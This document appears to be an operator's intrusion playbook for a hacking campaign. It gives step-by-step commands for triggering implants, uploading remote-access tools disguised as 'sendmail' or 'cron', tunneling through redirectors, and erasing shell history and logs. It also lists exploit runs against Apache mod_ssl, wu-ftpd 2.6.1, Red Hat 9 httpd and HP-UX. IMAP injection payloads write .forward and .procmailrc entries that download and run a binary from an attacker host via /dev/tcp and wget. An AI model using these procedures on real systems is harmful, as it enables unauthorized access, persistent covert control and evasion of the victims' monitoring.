Opscript

#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
#### CONNECT (or has scrubhands already done this for you?)
phone start
#### REDIAL (if using same ISP and still have floppy this is faster)
redial
#### TCPDUMP
cd /current/down
script -af tcpdump.raw
date; pwd; uname -a; ifconfig -a
tcpdump -ni ppp0
tcpdump -ni eth0
#### WORKING WINDOWS (also use "myenv" at any local prompt for pastables)
xterm &
cd /current/down
script -af script.$$
DISPLAY=:0.0
PS1="\t \h \w> "
PATH=../bin:/current/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin
export DISPLAY PS1 PATH; date; pwd; uname -a; netstat -rn ; ifconfig -a
#### some.target.ip
#### 1.2.3.4
#### TOUCH (see also -nslookup -trace -ping and -icmptime from a NOPEN redirecto
r)
nslookup some.target.ip
nslookup 1.2.3.4
nslookup -query=mx target.ip
nslookup -query=mx 1.2.3.4
ping -nc 5 1.2.3.4
traceroute 1.2.3.4
traceroute -n 1.2.3.4
# or with ICMP
traceroute -I 1.2.3.4
#### INC
#### See ourtn's many many options, to include new triggers
ourtn -h
ourtn -H
#### Get on up there
ourtn -ue 1.2.3.4
# if that one fails you have wrong ip maybe or try this
tn.spayed 1.2.3.4
#### INC TUNNEL (OLD WAY)
tunnel -localport 80 -tunnel FIRSTIP:port -target FIRSTIP -target SECONDIP
#### INC ONLY (no NOPEN)
ourtn 1.2.3.4
#### What to do?
w
# either make a working dir
mkdir /tmp/socket-root && cd /tmp/socket-root && chmod 0700 .
# or just use /tmp if deleting immediately...
cd /tmp && ls -arlt && pwd
~~p
../up/noserver sendmail
chmod 700 sendmail && netstat -an | grep 40019.*LISTEN || (PATH=. D="-l 40019" s
endmail && rm sendmail) ; ls -arlt
# ps -- choose one or more
echo p | crash
ps -ef
ps -efwww
pa auxwww
# NOPEN for business... (should not need if using ourtn -ue, and
# also can be found via didthis if using ourtn)
cd /current/down
../bin/noclient 1.2.3.4:40019
#### JL without jackpop redirector

suntelnet.sh 1.2.3.4 LOCALIP 23064 /tmp/socket-root sendmail 13 40019
#### JL with -jackpop

# Don't forget: -jackpop does not like its old windows
# existing still on later tries.
-jackpop 1.2.3.4 13 REDIRECTIP 23064
###################################################### BEGIN -jackpop/nopen one-
port
###################################################### BEGIN -jackpop/nopen one-
port
######
## NOTE: If problems (like lost connections) occur midstream with this method,
## look for our processes stranded on target (uudecode, sendmail,
## pt). If INCISION blessed, these will be hidden processes that will
## show up in a NOPEN =psdiff command as HIDDEN.
######
######
## JL via single available port (13 and 25 will both work) and
## run NOPEN session via that port too.
## Use this when JL trigger port is one and only port in or out.
######
######
## LOCALLY Start this in a scripted window.
## The local poptop will connect to 8080 down below.
######
myenv
noclient -l 8080
######
## LOCAL PREP (can do from any local dir--paste complete blocks)
## Some of these you willl not use, FYI.
######
## Unalias cp since these prompt otherwise
unalias cp
## Make sure this is right noserver
packrat -l sendmail /current/up/noserver
## Equivalently, do this step by step if you want:
## cp /current/up/noserver /current/up/sendmail
## compress -c /current/up/sendmail > /current/up/sendmail.Z
## chmod 755 /current/up/noserver /current/up/sendmail*
## uuencode /current/up/sendmail.Z sendmail.Z > /current/up/sendmail.Z.uu
## pick right poptop
cp /current/up/poptop.i586-pc-linux-gnu /current/up/pt
sum -s /current/up/pt /current/up/sendmail
chown 0:0 /current/up/pt* /current/up/sendmail*
tar -C /current/up -cvf /current/up/u.tar sendmail pt
compress -c /current/up/u.tar > /current/up/u.tar.Z
uuencode /current/up/u.tar.Z u.tar.Z > /current/up/u.tar.Z.uu
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
## Following should contain both sendmail and pt
tar tvzf /current/up/u.tar.Z
## Only need this if not using the "mostly automated" method below
gedit /current/up/u.tar.Z.uu&
## Probably don't need the rest unless target has no tar or uncompress:
uuencode /current/up/pt pt > /current/up/pt.uu
uuencode /current/up/sendmail sendmail > /current/up/sendmail.uu
uuencode /current/up/u.tar u.tar > /current/up/u.tar.uu
gedit /current/up/*.uu&
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
######
-jackpop 1.2.3.4 13 REDIRECTIP 23064
## Option 3 run command on target.
## Choose offset if needed, and IN bless or not as desired.
3
############################################
###### EITHER CHOOSE THIS COMMAND
## Mostly automated method--only works if you uudecode is on target.
## AND YOU DO NOT GET AN INTERACTIVE SHELL--until NOPEN is up and
## running, that is. (The environment syntax here will fail on csh
## or tcsh, e.g. with FreeBSD.)
##
## If this fails (due to missing uudecode, for example), you will
## be dropped into a shell, instead.
######
## IF this next line comes back with OOPS you are in an interactive shell and
## something failed with the command (wrong shell? uudecode/uncompress not there
?)
##
##NON-ICESKATE METHOD (using poptop):
##
##stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;s
leep 5;uudecode&&uncompress u.tar.Z&&tar xf u.tar&&PATH=. D=-l40019 sendmail&&rm
-f sendmail u.tar&&PATH=. exec pt 40019)||(echo OOPS&&exec sh)
##
####
## MODIFIED SINCE NO POPTOP AVAILABLE IN OP
##
##
stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sle
ep 5;uudecode&&uncompress sendmail.Z&&PATH=. D=-l40019 ./sendmail&&rm -f sendmai
l)||(echo OOPS&&exec sh)
##
###### OR CHOOSE THIS COMMAND###############
## More Manual method, gives interactive shell--WHOSE CONTENTS GO ACROSS IN THE
CLEAR.
######
# Command to run (some prep, then exec shell):
cd /tmp ; ls -arlt ; mkdir -p /tmp/socket-root ; cd /tmp/socket-root ; ls -alrt
; pwd ; exec sh
##########################
######
## That pops up a window connecting to port 13
######
#################################### IF USING MOSTLY AUTOMATED CHOICE ABOVE

######
## REMOTE in popped up shell window
######
## If using port 25 as your JL port, you have to quit out of the SMTP
## negotiation before continuing.
quit
## This causes local spawn program to push up /current/up/u.tar.Z.uu if

## it exists, but it can also take an argument of what uuencoded/ascii
## file to push up with:
## --p (defaults to /current/up/u.tar.Z.uu )
## --p /current/up/someotherfile
##
## MODIFIED SINCE NO POPTOP AVAILABLE IN OP
##
##
--p /current/up/sendmail.Z.uu
## Continue after seeing the traffic for the upload
## stop in the NOPEN/-jackpop window.
## This "---
" string causes the remote and local poptop programs to
## synch up to the waiting NOPEN server and client and should cause
## the NOPEN listener locally to start its connection to the target.
---
## Answer "A" to abort the autodone on the first NOPEN connection.
## Let autodone complete in one of your new windows you start up via
## the -tunnel command that follows after "END IF"
A
## Clean up (files should be gone already, might have working directory still)
-lt
-cd /tmp
-rm /tmp/socket-root
## The "sh -c stty -echo;..." process can and must be killed
ps -ef | grep stty
kill -9 THATPID
## After that, just "pt 40019" and "sendmail" processes remain
## and must stay until end of op
ps -ef
## Continue below after the "END IF" line similar to this "ELSE IF" one.
#################################### ELSE IF USING MANUAL CHOICE
################
#### WARNING:
#### This popped up shell window must be exited with "exit" and NOT ^D.
#### If you exit with ^D the sh and maybe other processes will be
#### stranded and not die cleanly.
################
######
## This is important: without it the paste to the uudecode fails, but
## otherwise it doesn't do much visibly.
######
stty -echo
# We use this shell to upload poptop and noserver.
# But first...(paste the whole bunch)
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
type perl uudecode uncompress tar
# if the type command fails try:
which perl uudecode uncompress tar
######
## no uudecode but we do have perl on target?
######
## LOCALLY run one of these (brings up new tab in gedit--use it)
## if uncompress on target
uudecode.pastable /current/up/u.tar.Z u.tar.Z
## if not
uudecode.pastable /current/up/u.tar u.tar
######
## LOCALLY select the gedit tab for what you want to
## paste up there (based on whether uncompress is there)
## Then middle-click paste it into target window.
######
######
## REMOTE--choose whatever makes sense--all should be safe
######
ls -arlt
uncompress *Z
for i in *tar ; do tar xvf $i ; done
ls -arlt
ls sendmail pt && rm u.tar*
######
## REMOTE -- Time to run NOPEN (and it inherits this session via pt)
######
# Start server listening and connect to it via poptop
# (you should see "tty should be setup...")
PATH=. D=-l40019 sendmail
PATH=. pt 40019
# Typing this next "---
" string activates poptop here and
# there to connect a local noclient to the remote noserver
# via this already established TCP session.
---
######
## FINI - clean up a bit
######
## Once NOPEN is up and running, both the previous hop's
## noclient window where -jackpop was run and the shell
## window it popped up will be tied up until we're done
## on the jackladder'd target.
######
-cd /tmp
-ls /tmp/socket-root
rm -rf /tmp/socket-root
#################################### END IF (CHOICE OF WHICH, MANUAL OR AUTO?)

# Op away....
# AUTODONE ?? Skip the autodone stuff in your first window on target,
# since that NOPEN session things the target's IP is 127.0.0.1.
# Instead, use the multiple window -tunnel trick below. In tnose
# new noclient windows on target, the correct target IP is used
# for all of the autodone stuff.
########################
## Need multiple NOPEN windows? This is the only way...
########################
######
## REMOTE start thistunnel
######
-tunnel
l 40019 1.2.3.4 40019
######
## LOCALLY as many times as you need windows
######
noclient -c "-cd /tmp" 127.0.0.1:40019
###### Bailing
## First, -exit any NOPEN sessions you started via the -tunnel,
## close that tunnel and quit out of -tunnel.
##
## Burn the NOPEN server. Post -burn/BURN on the new nopen,
## the popped up window should exit on its own. Use the "DONE"
## in the -jackpop window then.
######
-burn
BURN
DONE
######################################################## END -jackpop/nopen one-
port
######################################################## END -jackpop/nopen one-
port
#### JL with uploaded jackpop binary (way old way)

RA=REDIRECTIP RP=43122 \
TA=1.2.3.4 TP=13 \
sgitelnet.sh REDIRECTIP REDIRECTIP 23064 \
/tmp/socket-root sendmail 43122 40019
#### Upload jackpop before pasting command to redirector
~~p
../bin/jackpop jp
#### in NOPEN window on redirector you'll need
-rtun 23064
#### Now paste in the "chmod 700 && ....." command sgitelnet.sh gave you
#### CONNECT
#### some.target.ip
#### 1.2.3.4
../bin/noclient 1.2.3.4:40019
-nstun 1.2.3.4 40019
-rm sendmail
#### GOT ROOT?

-gs info
# AT JOB
cd /; echo "rm -rf /tmp/socket-root > /dev/null 2>&1" | at now + 180 minutes
at -l; date
mx
:%s/ât -r .*$/ at -r #### /g
`x
#### SURVEY
-gs survey
df -k
-find some.find
-lsh egrep '(tftpboot|cisco|router|hack|\.\.\.|tacac|ssh)' cmdout/some-find
-lsh egrep '(trip|twz|tw.config|aset)' cmdout/some-find
#### GO FREESTYLE
#### some.target.ip
#### 1.2.3.4
###
### BEGIN USER.MISSION File user.mission.generic.COMMON (see also ../etc/user.
mission.generic.COMMON)
###
############- TOUCH
#only from redirector **SKIP**
nslookup domain
nslookup ip
nslookup -query=mx domain_name
nslookup -query=mx domain_name
############- on solaris pingflag is -s
ping IP
TTL OS
2 - 32 Windows for Workgroups
2 - 32 Windows 95
34 - 64 Red Hat Linux (< version 6.0)
34 - 64 Digital UNIX
34 - 64 SCO
98 - 128 Windows NT
98 - 128 Windows 95 w/MS Dialup Network Upgrade
98 - 128 Windows 98
225 - 255 UNIX
Note: recent Sun OS 5.9 boxes TTL 34-64.
################### PITCHIMPAIR INSTRUCTIONS ###################################
###
###
### begin user.mission.pitchimpair
###
### get rid of pesky spaces at beginning of lines (fixes pasted html)
:%s/^[ ]*//g
:1
### Set up variables. Use the next section for reference.

## Description Typical Value Actual Value This OP
## --------------- ------------- --------------------
## local-ip: LOCAL_IP
## pitch-ip: PITCH_IP
## target-ip: TARGET_IP
## target-name: TARGET_NAME
## target-domain: TARGET_DOMAIN
## netcat-port: random NETCAT_PORT
## rat-port: nopen port RAT_PORT
## rat-name: sendmail RAT_NAME
## work-dir: .scsi WORK_DIR
# Make the changes here. Use the above for reference if you need it.
#######################################################################
#
# Need a new userlist ?
#
# -ls /global/m*/MB/*/*/*/mailinfo.dat > L:/current/down/userlist
#
# (N.B. the -ls will give the mailinfo.dat file timestamps in the
# format expected by lsstamp ... see next command)
#
# ## now, LOCALLY run lsstamp userlist > userlist.sorted
# ## (lsstamp will sort the -ls lines in date order)
#
# Collection: -get /global/m1/MB/96/8/karachi:moftec/mailinfo.dat
#
#
#######################################################################
mx
:%s/LOCAL_IP/LOCALIP/g
:%s/PITCH_IP/PITCH_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_NAME/TARGET_NAME/g
:%s/TARGET_DOMAIN/TARGET_DOMAIN/g
:%s/NETCAT_PORT/38745/g
:%s/RAT_PORT/RAT_PORT/g
:%s/RAT_NAME/sendmail/g
:%s/WORK_DIR/.scsi/g
:%s/mm-dd-yyyy/mm-dd-yyyy/g
`x
### Use this if we already own the target:
### Create /current/etc/hops.txt file
HOP1: PITCH_IP:R -lue
HOP2: TARGET_IP:R -uec
############ Set up nopen for access

###
### start upload in another window
cd /current/up
file noserver*
cp noserver.[sparc] noserver
### using NOPEN
file noserver*
packrat NETCAT_PORT
# cp noserver sendmail; compress -c sendmail | uuencode sendmail.Z > sen
dmail.uu
# ls -l sendmail.uu*
# nc -l -p NETCAT_PORT < sendmail.uu
### Filters out "last" command on initial ops on the target

echo "last" > /current/etc/autofilter.TARGET_NAME.TARGET_IP
# or
echo "last" > /current/etc/autofilter.TARGET_NAME.TARGET_DOMAIN.TARGET_IP
### in setting up windows, you probably want this

### td is an alias on HURRICANE and TYPHOON to set up a TCPDUMP xterm on
right screen
td
cd /current/down
script -a windows.tcpdump
tcpdump -i eth0 -n -n
### in addition to this (which scrubhands may have given you)
td
cd /current/down
script -a tcpdump.raw
tcpdump -i ppp0 -n -n
### Use something similar to this for annoying packets in the red tcpdump:
### Paste in a non-scripted window:
echo "pathcost" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "NetBeui" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "who-has" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "router" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
### if done via PITCHIMPAIR infrastructure:

###
### Get onto INCISION host:
###
# if using hops.txt:
ourtn
# if using commandline:
ourtn -uel PITCH_IP
# or
ourtn -ue PITCH_IP TARGET_IP
ourtn -eulc -o RAT_PORT PITCH_IP TARGET_IP
DISPLAY=
export DISPLAY
./ftshell ./tn.spayed PITCH_IP
### or
./ftshell ourtn PITCH_IP
### Check for our PID (shouldn't see it)
ps -ef|grep <PID>
### See who's on

w ; date
### Check for anything mucking with /tmp
ps -ef | grep \/tmp
df -k
dmesg
### Create working directory - first make sure /tmp doesn't have it alre
ady
ls -al /tmp
cd /tmp; ls -al
pwd
### check things out a bit...
ls -lart /etc | tail -30 ; uname -a ; date ; ifconfig -a ; w
### maybe check logs?

ls -lart /var/adm /var/log
### look for sniffers etc

ps -ef|grep ####
### upload RAT

~~p
../up/noserver.sparc sendmail
ls -al
chmod 700 sendmail && netstat -an | grep RAT_PORT
PATH=. D="-l RAT_PORT" sendmail && rm sendmail && ls -alrt
### in a local window, connect to pitchimpair via nopen, and start tunnels ####
### Ex: noclient 217.53.1.2:39222
cd /current/down
noclient PITCH_IP:RAT_PORT
#-readrc ../etc/norc.solaris
########################################
# INCISION to FreeBSD implant
########################################
# from local LINUX scripted window
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lue PITCH_IP
-irtun 219.238.199.144 RANDOM_PORT -z -s 80
setenv D -lNOPEN_PORT # NO = sign and use setenv
set path = (. /usr/bin /bin) # NO QUOTES and use set
~~p
/current/up/noserver cron # freebsd noserver
which cron
cron
# from NOPEN on the PITCHIMPAIR host:
-nstun 219.238.199.144:NOPEN_PORT
-cd /tmp
-lt
-rm cron
-lt
-------------------------------------
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lz TARGET_IP # or -irtun TARGET_IP PORT -lz
setenv D -lNOPEN_PORT # NO = sign and use setenv
set path = (. /usr/bin /bin) # NO QUOTES and use set
~~p
/current/up/noserver crond # freebsd noserver
which crond
crond
noclient TARGET_IP:NOPEN_PORT or -nstun TARGET_IP NOPEN_PORT
########################################
# JACKLADDER
########################################
### can be done without a redirector and will upload and execute nopen
jacktelnet.sh TARGET_IP LOCAL_IP NETCAT_PORT WORK_DIR RAT_NAME [JACKPORT]
########################################
# JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT)
########################################
### Local window, let this sit and wait:
ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1
### on PITCH: set up window for nopen callback
-nrtun 113
### on PITCH: set up tunnel for nopen upload
-tunnel
r NOPEN_UPLOAD_PORT
### on PITCH, run jackpop to tickle incision
-jackpop 202.38.128.1 110 211.40.103.194 13732
#3 run a command
/dev/ttyia2 PITCH_IP 443
yes ### let incision bless the commands
### incision will talk to your local window, then callback to your -nrtun window
###################################################
### REDIRECTING IN THRU WINDOWS
###################################################
################## SENDING TRIGGER THRU WINDOWS (2000 or XP) BOX ##############
############
##### NT4.0 doesn't allow the use of raw sockets, which is needed to send the I
N trigger ##
mx
:%s/LOCAL_WINDOWS_IP/LOCAL_WINDOWS_IP/g
:%s/LOCAL_UNIX_IP/LOCAL_UNIX_IP/g
:%s/UNIX_INCISION_TRIGGER_PORT/UNIX_INCISION_TRIGGER_PORT/g
:%s/INCISION_CALLBACK_PORT/INCISION_CALLBACK_PORT/g
:%s/NOPEN_CALLBACK_PORT/NOPEN_CALLBACK_PORT/g
:%s/WIN_TARG_INTERNAL_IP/10.140.0.9/g
:%s/TARGET_IP/10.140.0.40/g
`x
## Usage: script unixredirect.eps LOCAL-WINDOWS-IP LOCAL-UNIX-IP UNIX-INCISION-T
RIGGER-PORT INCISION-CALLBACK-PORT NOPEN-CALLBACK-PORT
script unixredirect.eps LOCAL_WINDOWS_IP LOCAL_UNIX_IP UNIX_INCISION_TRIGGER_POR
T INCISION_CALLBACK_PORT NOPEN_CALLBACK_PORT
### or run the following by hand
### On Windows box #####################

# Note: can use 'background' instead of 'monitor' in the windows command
s
# This sends the trigger:
# monitor packetredirect -packettype tcp -listenport LOCAL-PORT -bind LO
CAL-WIN-IP
# Ex. - monitor packetredirect -packettype tcp -listenport 32654 -bind D
OOBIEIP
monitor packetredirect -packettype tcp -listenport LOCAL_PORT -bind LOCA
L_WIN_IP
# This listens for the ish callback

# monitor redirect -tcp -implantlisten ISH-CALLBACK-PORT -target LOCAL-L
INUX-IP ISH-CALLBACK-PORT
# Ex. - monitor redirect -tcp -implantlisten 28345 -target FIREBALL_IP 2
8345
monitor redirect -tcp -implantlisten ISH_CALLBACK_PORT -target LOCAL_LIN
UX_IP ISH_CALLBACK_PORT
# For nopen connection:

# monitor redirect -tcp -lplisten RAT-PORT
# Ex. - monitor redirect -tcp -lplisten 47108
monitor redirect -tcp -lplisten RAT_PORT -target TARGET_IP RAT_PORT -bin
d LOCAL_WIN_IP
# For additional nopen connections, increment the lplisten port, but kee
p the same target nopen port:
# monitor redirect -tcp -lplisten RAT-PORT+1 -target TARGET-IP RAT-PORT
-bind LOCAL-WIN-IP
# Ex. - monitor redirect -tcp -lplisten 47109 -target 10.1.1.3 47108 -bi
nd 10.1.1.2
# Ex. - monitor redirect -tcp -lplisten 47110 -target 10.1.1.3 47108 -bi
nd 10.1.1.2
monitor redirect -tcp -lplisten RAT_PORT+1 -target TARGET_IP RAT_PORT -b
ind LOCAL_WIN_IP
### On Linux box: #####################
# Once the first three windows commands are set up, you can send the tri
gger:
# ourtn -W LOCAL-WIN-IP:LOCAL-PORT -o RAT-PORT -p ISH-CALLBACK-PORT -i W
IN-TARG-IP -ue TARGET-IP
# Ex: ourtn -W DOOBIE_IP:32654 -o 47108 -p 28345 -i 10.1.1.4 -ue 10.1.1
.3
#ourtn -W LOCAL_WIN_IP:LOCAL_PORT -o RAT_PORT -p ISH_CALLBACK_PORT -i WI
N_TARG_IP -ue TARGET_IP
#ourtn -W 192.168.254.253:31413 -O 41611 -C 202.154.225.27 -p 37541 -i 2
02.154.225.27 -ue 10.140.0.40
#ourtn -ueW 192.168.254.253:31413 -i 202.154.225.27 -C 202.154.225.27 -p
37541 -O 41611 10.140.0.40
TRAVOLTA=1 ourtn -ueW 192.168.254.22:8942 -i 10.140.0.9 -C 10.140.0.9 -p
18855 -O 7549 10.140.0.40
### Use the TRAVOLTA option to keep nopen from dying in 5 hours, only if you thi
nk the op will be extended
### If alien has issues with an nfs mount point, so use the "-Q" option to ourtn
and DO NOT run the following
### -lt /, df -k, otherwise, you'll tie up your window and will need to kill
the process;
### it's better NOT to run nopen built-ins on alien so that you can kill som
ething if it hangs
incision trigger = UNIX_INCISION_TRIGGER_PORT
incision callback = INCISION_CALLBACK_PORT
nopen callback = NOPEN_CALLBACK_PORT
#ourtn -ueW 192.168.254.142:36541 -i 10.140.0.9 -C 10.140.0.9 -p 34789 -O 45665

10.140.0.40
#ourtn -ueW LOCAL-WIN-IP:LOCAL-PORT -i WIN-TARG-IP -C WIN-TARG-INTERNAL-IP -p IS
H-CALLBACK-PORT -O RAT-PORT TARGET-IP
ourtn -ueW LOCAL_WINDOWS_IP:UNIX_INCISION_TRIGGER_PORT -i WIN_TARG_INTERNAL_IP -
C WIN_TARG_INTERNAL_IP -p INCISION_CALLBACK_PORT -O NOPEN_CALLBACK_PORT TARGET_I
P
noclient -l NOPEN_CALLBACK_PORT
#noclient -l 45665
# Call forward to nopen works to alien, start a -listen PORT to call fo

rward
# Set up redirectors on windows side to allow the following connections
:
mx
:%s/NOPEN_CALLFORWARD_PORT/NOPEN_CALLFORWARD_PORT/g
'x
# on windows side:
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT -target TARGET_IP NOPE
N_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+1 -target TARGET_IP NO
PEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+2 -target TARGET_IP NO
PEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
-listen NOPEN_CALLFORWARD_PORT
noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+1
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+2
#### To kill one server first use it to start a new one (new one won't b
urn)
D=-l23477 PATH=. sendmail
-burnBURN
# Connect to nopen; suggest using the port override option (-o) above fo
r simplicity
# For additional windows, you and the windows person must increment the
redirected port
# Ex. - noclient 10.1.1.2:47108
# Ex. - noclient 10.1.1.2:47109
#noclient 10.1.1.2:RAT_PORT+1
###########################################################
# YES - for HPUX
###########################################################
./yes 127.0.0.1 100083 1 PROGRAM_PORT 0x40062ea8 'mkdir /tmp/.scsi;cd /tmp/.scsi
&& /usr/bin/telnet PITCH_IP NETCAT_PORT </dev/console |uudecode 2>&1 > /dev/nul
l 2>&1 && uncompress -f sendmail.Z;chmod 0700 sendmail && export D=-cPITCH_IP:NO
PEN_PORT && ./sendmail'
###########################################################
# CUP
###########################################################
-gs wearcup -h
### to have it cleanup in 3 hours:
-gs wearcup -r <remote_name> -w 3h
### to have it cleanup in 2 minutes:
-gs wearcup -r <remote_name> -w 120s
### or, run it by hand:
### locally, edit cup, and change the working dir, and time in minutes to wait f
or execution
### upload cup

-put /current/up/cup.DEPRECATED.SEE.README.cup.NOPEN cup
-cat cup
### run cup
./cup &
ps -ef |grep sleep
### You can kill the sleep to make it execute immediately, or just let
### it run normally
-exit
#### DO NOT -burn !!!!!!!!! USE -exit INSTEAD!!!!!!!!!!
###########################################################
# HP Kernel Checks
###########################################################
# run these to check target for kernel info for implants:
/usr/bin/getconf SC_CPU_VERSION
/usr/bin/getconf SC_KERNEL_BITS
kmadmin -s
#########################################################
# EVENLESSON
#########################################################
# runs against Linux systems running Apache with mod_ssl accessing
# OpenSSL 0.9.6d or earlier on x86 architectures
# May not work first time; Try increasing the number of connections to the targe
t by 6.
# If this fails, try increasing the number of connections by 4 until you reach 4
0.
# SHould give you prompt on system - may have to elevate
#-scan 443 TARGET_IP
-scan http TARGET_IP
-scan ssl TARGET_IP
### Redirector:
-tunnel
l 443 TARGET_IP
r NETCAT_PORT
### query target:

./apache-ssl-linux_v3 -i 127.0.0.1
./apache-ssl-linux -i -s
### Usage:
# Usage: ./apache-ssl-linux <-i hostname> [-s scan banner] [-t arch] [-p port] [
-n <conne
ctions>] [-a 0x<address>]
### Usage for default values:
./apache-ssl-linux -i TARGET_IP -t ARCH
### Usage for increasing number of connections to increase chances

./apache-ssl-linux -i TARGET_IP -t ARCH -n 20
#### get ptrace, forkpty, and nopen tarball ready to send:

cd /current/up
cp ptrace<TAB> pt
cp noserver sendmail
cp forkpty fp
tar cvf 1u.tar pt sendmail fp
uuencode 1u.tar 1u.tar > 1u.tar.uu
nc -l -p NETCAT_PORT < 1u.tar.uu
#### to elevate and also get nopen there:
cd /tmp
mkdir .scsi
cd .scsi
telnet LOCAL_IP NETCAT_PORT > src
Connection closed by foreign host.
ls -la
uudecode src
ls -la
tar xvf 1u.tar
ls -la
chmod 700 fp sendmail pt
./fp
#### at sh-prompt, type:
tty
./pt
id
PATH=. sendmail
##### Cleanup
/var/log/httpd/error_log
###########################################################
# EYEMASK
###########################################################
### Imap masqerade
### Bring a local to get root
### for solaris
nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A005 EXAMINE .forward
A006 CREATE .forward
A008 APPEND .forward (\Seen) {145}
"| /bin/ksh -c '/bin/cat</dev/tcp/PITCH_IP/53>/tmp/sendmail;chmod +x /tmp/sendma
il;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT
# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
telnet TARGET_IP 143

A002 FETCH 1 RFC822
A004 FETCH 1 RFC822
A004 FETCH 1 RFC822
A100 LIST /etc/smrsh *
"| slocal"
A100 CREATE .maildelivery
A101 APPEND .maildelivery (\Seen) {37}
To user pipe A >/home/user/.g
A102 LIST "" %
A102 RENAME .g .procmailrc
A008 APPEND .procmailrc (\Seen) {128}
:0 c
|cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:2
5 PATH=/tmp sendmail;rm -f sendmail
A009 DELETE .maildelivery
A009 DELETE .procmailrc
A010 LOGOUT
telnet localhost 25
HELO helo
MAIL FROM: user@localhost.localdomain
RCPT TO: user@localhost.localdomain
DATA
.
QUIT
telnet fawn 143

A002 FETCH 1 RFC822
A004 FETCH 1 RFC822
A004 FETCH 1 RFC822
A102 LIST "/usr/bin/X11" %
"| /usr/bin/*11/xterm -display PITCH_IP:26000"
A010 LOGOUT
telnet fawn 25
HELO helo
MAIL FROM: user@fawn.beta.net
RCPT TO: user@fawn.beta.net
DATA
.
QUIT
### cleanup
possible logging in /var/adm/messages (should blend in if it fails)
###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection:
./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection:
-tunnel
l 21 TARGET_IP
# Locally:
./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# SHould give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# IF it complains about the user/pass correct, then it's not vulnerable to
# our pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure
###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0(SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release in not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost +
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "
cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target
### Locally
netstat -an |grep 6000
xhost +
########### REDIRECTED:
### Redirector:
-tunnel
l 443 TARGET_IP
r 6006 127.0.0.1 6000
r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
### Locally (choose a method):

